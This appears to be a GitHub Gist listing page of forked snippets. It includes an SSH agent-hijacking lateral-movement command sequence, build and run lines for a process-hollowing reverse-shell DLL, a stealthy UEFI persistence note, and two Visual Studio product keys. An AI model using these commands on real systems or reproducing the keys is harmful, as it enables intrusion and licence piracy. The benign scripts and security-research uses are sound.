Persist data in UEFI NVRAM variables.
- Stealthy way to store secrets and other data in UEFI.
- Will survive a reimaging of the operating system.
11philip22
/ WoW64_call.cpp
Created
July 20, 2021 06:51
— forked from Cr4sh/WoW64_call.cpp
WoW64 Heaven's Gate
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #define DB(_val_) __asm __emit (_val_) | |
| #define INVALID_SYSCALL (DWORD)(-1) | |
| // code selectors | |
| #define CS_32 0x23 | |
| #define CS_64 0x33 |
11philip22
/ gist:d4d2e68f2652032cd9e0e94f5636b909
Created
April 16, 2021 08:44
Visual Studio 2019 Product Key
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Visual Studio 2019 Enterprise | |
| BF8Y8-GN2QH-T84XB-QVY3B-RC4DF | |
| Visual Studio 2019 Professional | |
| NYWVH-HT4XC-R2WYW-9Y3CM-X4V3Y |
11philip22
/ _README.md
Created
March 18, 2021 09:03
— forked from jthuraisamy/_README.md
GospelRoom: Data Storage in UEFI NVRAM Variables
11philip22
/ SSH Agent Forwarding.md
Created
February 25, 2021 10:15
— forked from int0x80/SSH Agent Forwarding.md
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]
user@internal:~$ hostname -f
internal.company.tld
11philip22
/ SimpleHTTPServerWithUpload.py
Created
February 14, 2021 15:31
— forked from UniIsland/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| """ |
11philip22
/ rtd.py
Created
February 10, 2021 15:04
— forked from alexander-hanel/rtd.py
python recursive traversal disassembly using capstone and pefile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import re | |
| import pefile | |
| import string | |
| import struct | |
| from capstool import CapsTool | |
| from capstone import * | |
| from capstone.x86 import * | |
| BCC = ["je", "jne", "js", "jns", "jp", "jnp", "jo", "jno", "jl", "jle", "jg", |
11philip22
/ process-hollow-shell-dll.c
Created
November 26, 2020 10:41
— forked from FrankSpierings/process-hollow-shell-dll.c
Reverse shell which uses process hollowing technique
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll" | |
| // | |
| // Use -DDEBUG at compile time, for the logging printf messages. | |
| // Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process. | |
| // Use -DWAITFOR at compile time, to wait for the host process to finish. | |
| // | |
| // Run: | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe |
11philip22
/ zfs_health.sh
Created
September 25, 2020 00:10
— forked from petervanderdoes/zfs_health.sh
ZFS Health Check Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/local/bin/bash | |
| # | |
| # Calomel.org | |
| # https://calomel.org/zfs_health_check_script.html | |
| # FreeBSD 9.1 ZFS Health Check script | |
| # zfs_health.sh @ Version 0.15 | |
| # Check health of ZFS volumes and drives. On any faults send email. In FreeBSD | |
| # 10 there is supposed to be a ZFSd daemon to monitor the health of the ZFS | |
| # pools. For now, in FreeBSD 9, we will make our own checks and run this script |
11philip22
/ copy_selenium_cookies_to_cookiejar.py
Created
September 12, 2019 21:31
— forked from tubaman/copy_selenium_cookies_to_cookiejar.py
copy selenium cookies to cookielib CookieJar
NewerOlder